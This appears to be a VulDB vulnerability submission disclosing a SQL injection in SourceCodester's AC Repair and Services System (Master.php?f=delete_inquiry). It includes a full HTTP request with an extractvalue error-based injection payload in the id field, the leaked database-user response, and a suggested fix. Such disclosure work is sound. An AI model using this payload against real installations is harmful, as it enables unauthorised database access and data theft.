Submit #182578: SourceCodester AC Repair and Services System sql injection in Master.php info

TitleSourceCodester AC Repair and Services System sql injection in Master.php
DescriptionI find a SQL injection vulnerability in the SourceCodester AC Repair and Services System(https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html) This affect the file /classes/Master.php?f=delete_inquiry: POST /php-acrss/classes/Master.php?f=delete_inquiry HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------2854294418240524322736048278 Content-Length: 913 Origin: http://localhost Connection: close Referer: http://localhost/php-acrss/admin/?page=bookings/manage_booking Cookie: PHPSESSID=avms7d982mr3recfih6r7sfun0 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="id" 1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))# -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="fullname" 111 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="email" [email protected] -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="contact" 111 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="address" 111 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="services[]" 1 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="status" 0 -----------------------------2854294418240524322736048278-- And it returns "{"status":"failed","error":"XPATH syntax error: '~admin@localhost~'"}". This return value undoubtedly proves the existence of an SQL injection vulnerability here The vulnerability arises from the usage of the code "sql = "UPDATE inquiry_list set {data} where id = '{$id}' ";" without implementing adequate filtering on the controllable parameter id. This absence of proper filtering exposes the possibility of SQL injection attacks. To address this issue, my recommendation is to safeguard the id parameter against malicious exploitation by utilizing mysqli_real_escape_string().
Source⚠️ https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
User
 L2ncE (UID 50751)
Submission07/14/2023 05:29 (3 years ago)
Moderation07/15/2023 09:29 (1 day later)
StatusAccepted
VulDB entry234223 [SourceCodester AC Repair and Services System 1.0 HTTP POST Request Master.php?f=delete_inquiry ID sql injection]
Points20

PreviousOverviewNext

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!